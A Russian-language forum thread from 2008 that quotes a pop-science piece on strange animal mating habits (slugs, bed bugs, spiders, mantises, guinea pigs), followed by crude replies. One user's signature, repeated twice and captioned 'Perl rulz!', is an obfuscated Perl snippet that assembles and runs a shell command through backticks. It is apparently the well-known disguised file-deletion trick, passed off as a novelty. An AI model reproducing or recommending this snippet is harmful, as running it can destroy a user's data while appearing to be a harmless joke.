Добавлено: Вт Авг 12, 2008 4:26 am Заголовок сообщения:
Весёлая статья попалась
"Такое прозаическое существо, как слизень, подвергается изощреннейшему испытанию. Половые члены у слизней огромны: в семь раз длиннее тела. Вдали от своих владельцев они переплетаются, обмениваются спермой и часто запутываются узлом. Единственный способ освободиться от пут - одному из них перекусить свой член у основания."
"Близкий родственник постельного клопа, Xylocoris, иногда насилует другого самца. Его сперма проникает в выводящий канал жертвы, где хранится семенная жидкость. И когда изнасилованный будет оплодотворять самку, сперма насильника попадет в нее вместе с его собственной. Известны случаи, когда самцы подвергались изнасилованию во время совокупления с самкой."
"австралийский паук Latrodectus hasselti пытается оплодотворить самку, которая в сто раз больше его. Если он удачлив, то кувырком отправляется ей в рот, и она его съедает."
"Австралийский паук хочет быть съеденным. В этом его эволюционная стратегия, позволяющая перехитрить других самцов и саму партнершу: дав себя съесть, он отнимает у самки вдвое больше времени, чем если бы действовал иным путем, и повышает вероятность того, что именно его сперма оплодотворит ее яйцеклетки. А самка гарантирует партнеру-самоубийце отцовство, теряя после трапезы интерес к половой жизни."
"Самец богомола не желает быть убитым и съеденным, но в каждом третьем случае оказывается настолько неловок, что это, несмотря на все его старания, происходит. Удачливый самец подкарауливает самку, подкрадывается, прячась за растениями (и замирая, если она его заметила), а потом прыгает ей на спину, совокупляется часа два и улетает. Если же он не подгадал с прыжком, избранница-каннибалка поедает его. Как ни странно, это не мешает ему заниматься сексом. Он не останавливается, даже когда она отъела у него голову; больше того: потеряв голову, он лишается всяких сдерживающих центров и впадает в сексуальное неистовство."
"После полового акта самец морской свинки оставляет во влагалище подруги трехсантиметровую затычку, чтобы подругу не осеменил соперник." _________________ But all I want is you
Pansy
если трахнешь так что сил нету двигаться, то можна =* _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
и то и другое))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Зато я против!У меня не так много друзей! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.